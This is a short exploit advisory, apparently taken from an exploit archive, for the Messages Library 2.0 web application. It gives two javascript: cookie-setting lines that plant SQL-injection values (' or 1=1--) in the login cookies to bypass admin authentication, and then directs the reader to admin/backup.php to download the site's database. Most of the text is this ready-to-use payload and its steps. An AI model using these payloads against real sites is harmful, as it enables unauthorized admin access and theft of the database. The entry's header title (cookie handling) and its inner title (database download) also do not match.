id: 5447
date: 06/30/2009
title: Messages Library 2.0 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

===========================================================
Messages Library 2.0 Insecure Cookie Handling Vulnerability
===========================================================


# Messages Library 2.0 <=  Arbitrary Database Download Vulnerability
########################################
#[*] Founded &  Exploited by : Stack
########################################
 
Bypass with
 
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
 
After Exec
 
http://localhost/sms/admin/backup.php
 
and you got the database download




#  0day.today [2023-03-27]  #